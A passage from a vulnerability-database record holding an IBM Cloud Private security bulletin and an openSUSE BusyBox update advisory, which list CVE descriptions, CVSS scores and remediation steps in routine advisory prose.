remote attacker to execute arbitrary commands on the system, caused by improper validation of hostnames passed to ssh. By sending a specially-crafted request, an attacker could exploit this vulnerability to inject and execute arbitrary commands on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/133105> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-0379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0379>) \n**DESCRIPTION:** Libgcrypt could allow a local attacker to obtain sensitive information, caused by a flaw in the cipher/ecc.c and mpi/ec.c. By using Curve25519 side-channel attacks, an attacker could exploit this vulnerability to discover a secret key. \nCVSS Base Score: 2.9 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/131281> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2017-15908](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15908>) \n**DESCRIPTION:** systemd is vulnerable to a denial of service, caused by an error in the dns_packet_read_type_window function. By sending a specially-crafted DNS NSEC resource record data, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/134141> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2016-2774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2774>) \n**DESCRIPTION:** ISC DHCP is vulnerable to a denial of service, caused by the failure to limit the number of open TCP connections to the ports for inter-process communications and control. By opening a large number of TCP connections, a remote attacker from within the local network could exploit this vulnerability to become unresponsive or consume all available sockets. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111319> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2017-16544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16544>) \n**DESCRIPTION:** BusyBox could allow a remote attacker to execute arbitrary code on the system, caused by the improper sanitization of filename in the add_match function in libbb/lineedit.c. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135207> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-15650](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15650>) \n**DESCRIPTION:** musl libc is vulnerable to a stack-based buffer overflow, caused by the failure to restrict the number of addresses in the dns_parse_callback function in network/lookup_name.c. By sending specially-crafted DNS replies, a remote attacker could exploit this vulnerability to provide an unexpected number of addresses. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/133862> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2017-12883](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12883>) \n**DESCRIPTION:** PERL is vulnerable to a denial of service, caused by a buffer overflow in the regular expression parser. By using vectors involving the use of RExC_parse in the vFAIL macro, a remote attacker could exploit this vulnerability to cause the application to crash or leak data from memory. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132298> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H)\n\n**CVEID:** [CVE-2017-10285](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10285>) \n**DESCRIPTION:** An unspecified vulnerability in Oracle Java SE related to the Java SE, Java SE Embedded RMI component could allow an unauthenticated attacker to take control of the system. \nCVSS Base Score: 9.6 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/133723> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-9800](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9800>) \n**DESCRIPTION:** Apache Subversion could allow a remote attacker to execute arbitrary commands on the system, caused by the connection to URLs provided by the repository. By committing to a honest server, an attacker could exploit this vulnerability using a specially crafted svn+ssh:// URL to execute arbitrary shell commands on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/130360> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-14867](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14867>) \n**DESCRIPTION:** Git could allow a remote attacker to execute arbitrary commands on the system, caused by the use of unsafe Perl scripts to support subcommands. By using specially-crafted shell metacharacters in a module name, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132826> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-5563](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5563>) \n**DESCRIPTION:** LibTIFF is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the tif_lzw.c. By persuading a victim to open a specially-crafted bmp image file, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/121605> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-8816](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8816>) \n**DESCRIPTION:** cURL libcurl is vulnerable to a buffer overflow, caused by an integer overflow flaw in the NTLM authentication feature. By using vectors involving long user and password fields, a remote attacker could overflow a buffer and execute arbitrary code and cause the application to crash. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135657> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-6891](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6891>) \n**DESCRIPTION:** GnuTLS libtasn1 is vulnerable to a stack-based buffer overflow, caused by 2 errors in the asn1_find_node function in lib/parser_aux.c. By persuading a victim to open a specially-crafted assignments file, a remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/127214> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2017-14176](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14176>) \n**DESCRIPTION:** Bazaar could allow a remote attacker to execute arbitrary commands on the system, caused by a flaw when Subprocess SSH is used. By sending a bzr+ssh URL with an initial dash character in the hostname, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135732> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-13089](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13089>) \n**DESCRIPTION:** GNU wget is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the skip_short_body() function in src/http.c. By sending a specially-crafted HTTP data, a remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/134200> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cloud Private 2.1.0\n\n## Remediation/Fixes\n\nFor the 2.1.0.x releases: upgrade to version 2.1.0.3 Fix Pack 1 or later\n\n * [IBM Cloud Private 2.1.0.3 Fix Pack 1](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-2.1.0.3-build497276&includeSupersedes=0>)\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 July 2018 - original document published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Internal Use Only\n\nPR:118490 | A:12622 | IBM Cloud private | IBM Cloud Private Package Vulnerabilities from Vulnerability Advisor Scan [323813]\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Product\":{\"code\":\"SSBS6K\",\"label\":\"IBM Cloud Private\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-20T18:56:04", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities affect IBM\u00ae Cloud Private", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2774", "CVE-2017-0379", "CVE-2017-1000116", "CVE-2017-1000117", "CVE-2017-10285", "CVE-2017-12883", "CVE-2017-13089", "CVE-2017-14176", "CVE-2017-14867", "CVE-2017-15412", "CVE-2017-15422", "CVE-2017-15650", "CVE-2017-15908", "CVE-2017-16544", "CVE-2017-16546", "CVE-2017-16612", "CVE-2017-17426", "CVE-2017-17512", "CVE-2017-5563", "CVE-2017-6891", "CVE-2017-7526", "CVE-2017-8816", "CVE-2017-9800", "CVE-2018-0733", "CVE-2018-0739", "CVE-2018-1000122", "CVE-2018-5146"], "modified": "2018-07-20T18:56:04", "id": "B05329785ED4441E67419C72F4E8D5EFB095312F0129B7DAC17DB1F2F0780EEC", "href": "https://www.ibm.com/support/pages/node/716653", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-05-18T14:38:39", "description": "An update that fixes 32 vulnerabilities is now available.\n\nDescription:\n\n This update for busybox fixes the following issues:\n\n - CVE-2011-5325: Fixed tar directory traversal (bsc#951562).\n - CVE-2015-9261: Fixed segfalts and application crashes in huft_build\n (bsc#1102912).\n - CVE-2016-2147: Fixed out of bounds write (heap) due to integer underflow\n in udhcpc (bsc#970663).\n - CVE-2016-2148: Fixed heap-based buffer overflow in OPTION_6RD parsing\n (bsc#970662).\n - CVE-2016-6301: Fixed NTP server denial of service flaw (bsc#991940).\n - CVE-2017-15873: Fixed integer overflow in get_next_block function in\n archival/libarchive/decompress_bunzip2.c (bsc#1064976).\n - CVE-2017-15874: Fixed integer underflow in\n archival/libarchive/decompress_unlzma.c (bsc#1064978).\n - CVE-2017-16544: Fixed Insufficient sanitization of filenames when\n autocompleting (bsc#1069412).\n - CVE-2018-1000500 : Fixed missing SSL certificate validation in wget\n (bsc#1099263).\n - CVE-2018-1000517: Fixed heap-based buffer overflow in the\n retrieve_file_data() (bsc#1099260).\n - CVE-2018-20679: Fixed out of bounds read in udhcp (bsc#1121426).\n - CVE-2019-5747: Fixed out of bounds read in udhcp components\n (bsc#1121428).\n - CVE-2021-28831: Fixed invalid free or segmentation fault via malformed\n gzip data (bsc#1184522).\n - CVE-2021-42373: Fixed NULL pointer dereference in man leading to DoS\n when a section name is supplied but no page argument is given\n (bsc#1192869).\n - CVE-2021-42374: Fixed out-of-bounds heap read in unlzma leading to\n information leak and DoS when crafted LZMA-compressed input is\n decompressed (bsc#1192869).\n - CVE-2021-42375: Fixed incorrect handling of a special element in ash\n leading to DoS when processing a crafted shell command, due to the shell\n mistaking specific characters for reserved characters (bsc#1192869).\n - CVE-2021-42376: Fixed NULL pointer dereference in hush leading to DoS\n when processing a crafted shell command (bsc#1192869).\n - CVE-2021-42377: Fixed attacker-controlled pointer free in hush leading\n to DoS and possible code execution when processing a crafted shell\n command (bsc#1192869).\n - CVE-2021-42378: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the getvar_i\n function (bsc#1192869).\n - CVE-2021-42379: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the\n next_input_file function (bsc#1192869).\n - CVE-2021-42380: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the clrvar\n function (bsc#1192869).\n - CVE-2021-42381: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the hash_init\n function (bsc#1192869).\n - CVE-2021-42382: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the getvar_s\n function (bsc#1192869).\n - CVE-2021-42383: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the evaluate\n function (bsc#1192869).\n - CVE-2021-42384: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the\n handle_special function (bsc#1192869).\n - CVE-2021-42385: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the evaluate\n function (bsc#1192869).\n - CVE-2021-42386: Fixed use-after-free in awk leading to DoS and possibly\n code execution when processing a crafted awk pattern in the nvalloc\n function (bsc#1192869).\n\n\nPatch Instructions:\n\n To install this SUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-2022-135=1 openSUSE-SLE-15.3-2022-135=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T00:00:00", "type": "suse", "title": "Security update for busybox (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5325", "CVE-2015-9261", "CVE-2016-2147", "CVE-2016-2148", "CVE-2016-6301", "CVE-2017-15873", "CVE-2017-15874", "CVE-2017-16544", "CVE-2018-1000500", "CVE-2018-1000517", "CVE-2018-20679", "CVE-2019-5747", "CVE-2021-28831", "CVE-2021-42373", "CVE-2021-42374", "CVE-2021-42375", "CVE-2021-42376", "CVE-2021-42377", "CVE-2021-42378", "CVE-2021-42379", "CVE-2021-42380", "CVE-2021-42381", "CVE-2021-42382", "CVE-2021-42383", "CVE-2021-42384", "CVE-2021-42385", "CVE-2021-42386", "CVE-2022-21465", "CVE-2022-21471", "CVE-2022-21487", "CVE-2022-21488", "CVE-2022-21491"], "modified": "2022-05-18T00:00:00", "id": "OPENSUSE-SU-2022:0135-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LN3PAYMZPLB6NN4YV3CZW2562WYNBLKC/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}